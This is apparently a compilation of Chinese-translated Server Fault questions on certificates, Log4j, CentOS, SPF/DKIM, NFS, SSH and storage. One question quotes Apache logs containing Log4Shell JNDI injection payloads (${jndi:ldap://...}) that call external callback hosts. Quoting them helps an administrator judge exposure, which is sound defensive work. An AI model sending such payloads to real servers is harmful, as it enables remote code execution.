server

我们有一个由 GoDaddy 颁发的通配符证书即将更新，我想使用另一家公司（尚未选择）。通配符证书在几个服务器上的十几个站点上使用。在新机构颁发证书与我们可以在所有这些站点和服务器上安装证书之间会有几个小时的间隔。在那段时间里，我们的用户会注意到什么吗，例如，

1. “站点不安全”类型的警告
2. 站点完全无法运行（它们是 Windows/IIS 站点）。

我想知道，例如，新的权威机构是否向 GoDaddy 发布了一些东西，使 GoDaddy 撤销了他们存档的我们的证书。或者，Web 浏览器是否会发现已安装的证书与新颁发的证书不匹配，从而导致问题。

chrony 文档警告

警告：某些软件会受到系统时间中此类跳跃的严重影响。（这就是 chronyd 正常使用回转的原因。）文档

但是文档没有给出示例。将受到严重影响的软件示例有哪些？操作系统或任何后台进程是否存在风险？

apache 网络服务器 (apache2) 是否使用 log4j？

我在 Raspberry Pi OS（64 位）上安装了 Apache2 2.4.38（debian），并在我的日志中发现了一些关于来自（蜜罐/扫描仪）、（离线和恶意？）和（我不知道是什么）的CVE-2021-44228的奇怪记录这是）kryptoslogic-cve-2021-44228.comdataastatistics.coma8fvkc.dnslog.cn

我现在该怎么办？

• 没什么，因为 apache2 不受 CVE-2021-44228 的影响
• 格式化所有内容并等待几天，然后再安装修补版本
• “检查”是否有任何新的 .class 文件以及是否没有继续操作（并使用手动补丁，例如log4j2.formatMsgNoLookups = TRUE
• 别的东西

日志：

139.59.99.80 - - [12/Dec/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:00:34:48 +0100] "GET / HTTP/1.1" 200 5932 "http://79.232.126.49/" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:01:51:38 +0100] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 301 654 "-" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [11/Dec/2021:18:35:25 +0100] "GET / HTTP/1.1" 200 5932 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228.com/http443useragent}"
139.59.99.80 - - [11/Dec/2021:20:13:11 +0100] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 8456 "-" "Kryptos Logic Telltale"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}"
137.184.106.119 - - [10/Dec/2021:20:38:18 +0100] "GET / HTTP/1.1" 301 568 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:20 +0100] "GET / HTTP/1.1" 200 6576 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:21 +0100] "GET /favicon.ico HTTP/1.1" 200 7103 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"

我已经阅读了与 Log4j 相关的安全漏洞。

如何检查我的服务器上是否安装了 Log4j？我的特定服务器使用Ubuntu 18.04.6 LTS.

我已经安装了许多第三方软件包，其中一些可能包含它。

是否有命令在我的服务器上运行以检查是否安装了 Log4j？

我是否需要在纯文本和控制台服务器上使用 GPU？没有 GPU，就像没有 iGPU 和 dGPU 一样。我将使用 SSH，所以我不需要显示。

我使用的是 Linux，但操作系统不应该影响结果

我们正在开发一个软件解决方案，我们的一些供应商确实以 CentOS 7 为中心。

CentoS 7 将在 RHEL 7 生命周期的剩余时间内继续生产，该生命周期将在 2024 年的某个时间结束。

CentOS 8 将在 2021 年 12 月之前收到更新。

CentOS Stream 由 Red Hat 宣布，但显然不是 CentOS 的替代品。

如果在不久的将来 CentOS 的选项不确定，我不太喜欢在这方面进行深入研究。

问题：当 RHEL 7 达到其生命周期并且用户需要生产就绪服务器时，CentOS 7 用户有哪些选择？

最终编辑：我似乎对 DKIM 完全错误，签名域不必与发件人域相同，因此我的问题的整个前提是有缺陷的。非常感谢保罗指出我的错误！

下面的原始问题：

我已尝试阅读 SPF 和 DKIM，但我不明白同时使用两者的意义，至少在打击垃圾邮件的情况下（伪造的发件人地址，这可能导致我的电子邮件服务器/域被列入黑名单）。据我所知，仅 DKIM 就应该完成 SPF 应该完成的工作。

到目前为止，我的理解如下：

1. 发送电子邮件时，发件人可以声明他们想要的任何内容（例如虚假发件人地址）
2. DKIM 允许检测伪造的发件人电子邮件地址，因为您可以根据 DNS TXT 记录中的公钥验证 DKIM 签名。
3. SPF 允许您验证电子邮件是从有权为给定发件人地址发送电子邮件的邮件服务器发送的。

我不明白的是：除非 DKIM 私钥以某种方式受到损害，否则仅 DKIM 验证就足以验证电子邮件是从授权的电子邮件服务器发送的，否则电子邮件服务器将不会用于签署电子邮件的私钥。

我在这里看到了一个非常相似的问题的答案：https ://serverfault.com/a/780248/154775 ，其中作者声称 DKIM 无法防止重放攻击。我会承认这一点，但我发现这是一个极端情况，我认为迄今为止最大的问题是带有虚假发件人地址的垃圾邮件 - DKIM 应该可以自己轻松地防止这种情况。

与仅 DKIM 相比，是否存在 SPF 提供额外保护的重放攻击以外的场景？

编辑：我用粗体标记了我的问题的核心，以澄清我到底想要回答什么。

我正在帮助运营一个网站，该网站因政治原因被之前试图阻止 Telegram (RosKomNadzor) 的同一个俄罗斯机构阻止。这不是第一次发生，以前我们只会更改域，但这有其自身的影响和读者群的损失。

他们只阻止域名，而不是 IP（无论如何我们都在使用 Cloudflare）。我们正在使用 HTTPS，但 ISP 仍然能够以某种方式从他们的客户端获取有关我们的请求的 DNS 信息。从技术上讲，我们可以建议我们的读者配置他们的/etc/hosts，但这不是一个可行的选择。

是否可以在我们的服务器端加密/混淆 DNS 信息，而无需用户进行任何更改/安装软件？还是等待 DNS over HTTPS 成为我们唯一的选择？

来自俄罗斯的爱。

有很多关于如何使用RJ45 压接工具的视频和说明。我见过一些，我什至测试过压接工具，但我仍然不明白它是如何工作的。

压接工具内的八根线到底发生了什么，为什么在将电缆放入压接工具之前不需要去除八根线的绝缘层？

我正在使用带有 Xen Hypervisor 的 ubuntu 20.04。在我的机器上，我有一个 SSD 来托管我的 VM 映像，然后是四个我有数据的 sata 驱动器。我当前的设置是将数据挂载到我的 domain0 上，然后通过网络文件服务器将该数据提供给其他 VM。

这似乎效率低下，因为所有虚拟机都必须通过我的 NIC 才能访问数据。我认为这是一个很大的瓶颈是否正确？

在同一台物理机中提供数据的行业标准是什么？对此设置有何建议或改进？

在每个 VM 上安装数据 LVM 是否有害？我对这种方法的担忧是，如果两个 VM 尝试同时访问同一个数据点会发生什么？此设置是否容易受到数据损坏的影响？

在 Windows 2019 服务器上，驱动器 D: 已 100% 满（已使用 500 Gb）：

我试图了解为什么磁盘已满，但我不能，因为文件资源管理器和 Total Commander 报告使用的不超过 33 Gb：

奇怪的是，WinDirStat 报告开始摘要中使用了 100% (500 Gb)，但分析后只使用了 33 Gb：

请注意：

• 我以管理员身份登录
• 我以管理员权限启动 WinDirStat
• 我尝试使用本地管理员和 Active Directory域管理员
• 我在文件资源管理器和 Total Commander 中启用了隐藏文件和系统文件
• 我在 D: 驱动器上运行 chkdsk 没有发现任何问题

我找到了 33 Gb 的数据。其他 467 Gb 在哪里？

假设连接是通过 LAN 1Gbe 或 10Gbe 连接，是否可以在生产服务器上合理使用 NFS 作为将计算服务器连接到存储服务器的一种方式？

如果启用了同步模式，显然会有一些网络开销，并且 NFS 的写入速度似乎特别慢。否则，它似乎相当轻巧并且能够根据我的判断进行扩展，但我个人对此几乎没有经验。我错了吗？

问题是我现在有一个服务器，它既可以用作存储服务器，也可以用作 Web 服务器，但我最终可能需要将两者分开，并且考虑到某些请求需要通过 Web 应用程序层进行身份验证在初始化文件传输之前，这个软件有点棘手。网络 fs 挂载是我最简单的选择.. 不知道这是否是一个好的选择。

我还计划尝试将本地缓存与 NFS 结合使用，这应该会大大提高性能，但我不确定这是否足够。

至于替代品，我知道只有 iSCSI 是真正的竞争对手，而且大多数人似乎都推荐 NFS 而不是其他鲜为人知的产品。

我最近在 IDS 日志中看到了一件奇怪的事情。这是一份传出连接的报告，显示父进程为/usr/sbin/sshd -R.

我知道 (client) 用于远程端口转发的-R参数ssh，但从未见过daemon-R的选项。sshd

中没有-R出现man sshd。这个论点有什么作用？

我最近研究了高级文件系统（Btrfs、ZFS）的数据冗余和可用性，并对它们提供的附加功能感兴趣，尤其是它们针对数据损坏的“自我修复”功能。

但是，我认为我需要退后一步，尝试了解与传统的 mdadm-Raid1 + 相比，对于一般家庭/SMB 使用而言，这种优势是否超过了它们的劣势（Btrfs 错误和未解决的问题以及 ZFS 可用性和性能影响） Ext4 解决方案。无论哪种方式都可以使用镜像备份。

假设我有几个文件服务器用于归档目的并且资源有限，但是 ECC 内存和稳定的电源。

1. 我什至遇到实际数据损坏导致文件无法读取的可能性有多大？如何？
2. Ext4 或系统文件管理器是否已经检测到复制/移动操作中的数据错误，让我至少意识到一个问题？
3. 如果 madam-Raid1 驱动器中的一个驱动器由于一个驱动器有坏扇区而保存了不同的数据，会发生什么情况？我仍然能够检索到正确的文件，还是阵列无法确定哪个文件是正确的并完全丢失？

我在线设置了一个可供任何人公开访问的 SSH 服务器。因此，我从世界各地的 IP 获得了很多连接。奇怪的是，实际上没有人尝试进行身份验证以打开会话。我可以自己连接和验证没有任何问题。

有时，我会error: kex_exchange_identification: Connection closed by remote host在服务器日志中获取信息。是什么原因造成的？

这是 30 分钟的 SSH 日志（公共 IP 已被编辑）：

# journalctl SYSLOG_IDENTIFIER=sshd -S "03:30:00" -U "04:00:00"
-- Logs begin at Fri 2020-01-31 09:26:25 UTC, end at Mon 2020-04-20 08:01:15 UTC. --
Apr 20 03:39:48 myhostname sshd[18438]: Connection from x.x.x.207 port 39332 on 10.0.0.11 port 22 rdomain ""
Apr 20 03:39:48 myhostname sshd[18439]: Connection from x.x.x.207 port 39334 on 10.0.0.11 port 22 rdomain ""
Apr 20 03:39:48 myhostname sshd[18438]: Connection closed by x.x.x.207 port 39332 [preauth]
Apr 20 03:39:48 myhostname sshd[18439]: Connection closed by x.x.x.207 port 39334 [preauth]
Apr 20 03:59:36 myhostname sshd[22186]: Connection from x.x.x.83 port 34876 on 10.0.0.11 port 22 rdomain ""
Apr 20 03:59:36 myhostname sshd[22186]: error: kex_exchange_identification: Connection closed by remote host

这是我的 SSH 配置：

# ssh -V
OpenSSH_8.2p1, OpenSSL 1.1.1d  10 Sep 2019
# cat /etc/ssh/sshd_config 
UsePAM yes
AddressFamily any
Port 22
X11Forwarding no
PermitRootLogin prohibit-password
GatewayPorts no
PasswordAuthentication no
ChallengeResponseAuthentication no
PrintMotd no # handled by pam_motd
AuthorizedKeysFile .ssh/authorized_keys .ssh/authorized_keys2 /etc/ssh/authorized_keys.d/%u
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_ed25519_key
KexAlgorithms [email protected],diffie-hellman-group-exchange-sha256
Ciphers [email protected],[email protected],[email protected],aes256-ctr,aes192-ctr,aes128-ctr
MACs [email protected],[email protected],[email protected],hmac-sha2-512,hmac-sha2-256,[email protected]
LogLevel VERBOSE
UseDNS no
AllowUsers root
AuthenticationMethods publickey
MaxStartups 3:100:60

在网上搜索后，我看到了MaxStartups表明这可能是导致此错误的原因的参考资料，但是在更改了我的默认值sshd_config并尝试超过 3 个连接后，服务器明确指出了问题

Apr 20 07:26:59 myhostname sshd[31468]: drop connection #3 from [x.x.x.226]:54986 on [10.0.0.11]:22 past MaxStartups

那么，是什么原因造成的error: kex_exchange_identification: Connection closed by remote host呢？